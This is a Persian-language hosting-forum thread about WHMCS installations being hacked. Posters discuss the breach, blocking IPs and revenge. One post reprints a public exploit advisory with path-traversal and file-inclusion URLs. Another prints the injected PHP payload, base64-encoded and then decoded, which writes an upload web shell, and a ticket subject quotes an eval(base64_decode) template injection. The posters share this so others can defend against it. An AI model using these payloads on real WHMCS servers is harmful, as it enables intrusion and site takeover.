هک شدن از طریق whmcs5

[taranoome]

هم باگ رفع شده
هم پوشه های دانلود و تمپلت و ... درد دسترس نیس
الان با آیپیش میتونم شکایت کنم؟
مشهدیه

---------- Post added at 06:09 PM ---------- Previous post was at 06:07 PM ----------

وای خدا این مشتریمه
الان کل هاست هاشو دلیت میزنم

جون شما گفتی مشهدیه فکر کنم همونیه که فکرش رو میکنم

---------- Post added at 06:21 PM ---------- Previous post was at 06:17 PM ----------

دوست من این نیست ببین خاسته شوخی بکنه باهات
به دل نگیر

[mehrshad.ho]

بهتره یک تاپیک ایجاد بشه و آی پی و ایمیل هکران رو اعلام کنیم تا همه مسدود کنند

[maryam1]

من که اعلام کردم الان نصف ایران هکر این سیستم هستند

[taranoome]

عزیزم یه مسئله کوچیک رو این همه بزرگش که نمیکنند
اگه اون شخصم هکر باشه با ای پی واقعی وارد سیستم نمیشه بهتره جای این کارا باگای تو سیستمتون رو برطرف کنید دوستان عزیز
نه اینکه به فکر انتقام باشی

[maryam1]

نتونست کاری کنه که باگ ها هم بر طرف شده
سیستمم هم لایسنس داره و خدا رو شکر من اولین نفری بودم که هک شدم و منو همون بچه ی عرب هک کرد
من یه اشتباه کردم اینجا تاپیک زدم و آموزش دادم که چه جوری عمل میکنه تا بچه ها باگو ببندن اما هر کی این تاپیکو خوند هکر شد
از مدیرا میخوام تاپیک حذف بشه
یا پست هایی که جوری آموزشیست

---------- Post added at 06:48 PM ---------- Previous post was at 06:44 PM ----------

الان همه هکر شدن شما چه طور؟

[plastic]

بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:

کد:

$b0x#  WHMCS ( WHMCompleteSolution )  3.x / 4.x  Multiple Vulnerability !
$b0x#  ZxH-Labs
$b0x#  1st-NOV-11
$b0x#  Www.Sec4ever.coM
$b0x#  WH-03 On Windows IIS 6.0

========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure
              
Files : Submitticket.php , Downloads.php

       -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
             EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

       ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP#  cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

             -I : reports.php?report=[LFI]%00
                EX : admin/reports.php?report=../../../../../../../boot.ini%00
            
               You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
            However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
                  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
              And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |  TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN  | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3  And All Q8'z

./b0x

------------------------------------
کل کدي که اينجکت ميشه در تيکت ها( با توجه به ارسال maryam1) اين هست:

کد:

<?php
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>

و $code عبارته از:

کد:

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

با توجه به اين موارد ميتونيد جلوي مورد رو بگيريد.

[maryam1]

بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟

کاربر: iiiii gggggg #77
بخش: بخش فروش
موضوع: {php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}

[plastic]

من با whmcs کار نکردم اما اگر بی بی کد {php} رو غیر فعال بکنید فکر نکنم کسی بتونه کد پی اچ پی به این شکل رو ران بکنه.
دوستانی که استفاده کردن میتونن بگن.
خودکفا

[Mohammad_reza]

بهتره یک تاپیک ایجاد بشه و آی پی و ایمیل هکران رو اعلام کنیم تا همه مسدود کنند

متأستفانه بدلیل آی پی های داینامیک در فضای اینترنت ایران امکان چنین کاری میسر نیست ...

[NovinServer]

مسخره بازی بعضی ها در این انجمن گل کرده است !
اقایون، خواهشا پا نشوید بیاید هی یوزر بسازید تیکت بزنید !
خوبه که باگ بسته شده باز هم .... ! وقعا زشت هست ....

ایپی مسدود شده : 31.7.61.22
که می دانم از کی هم سرویس گرفتی و به ITJavani گزارش خواهد شد .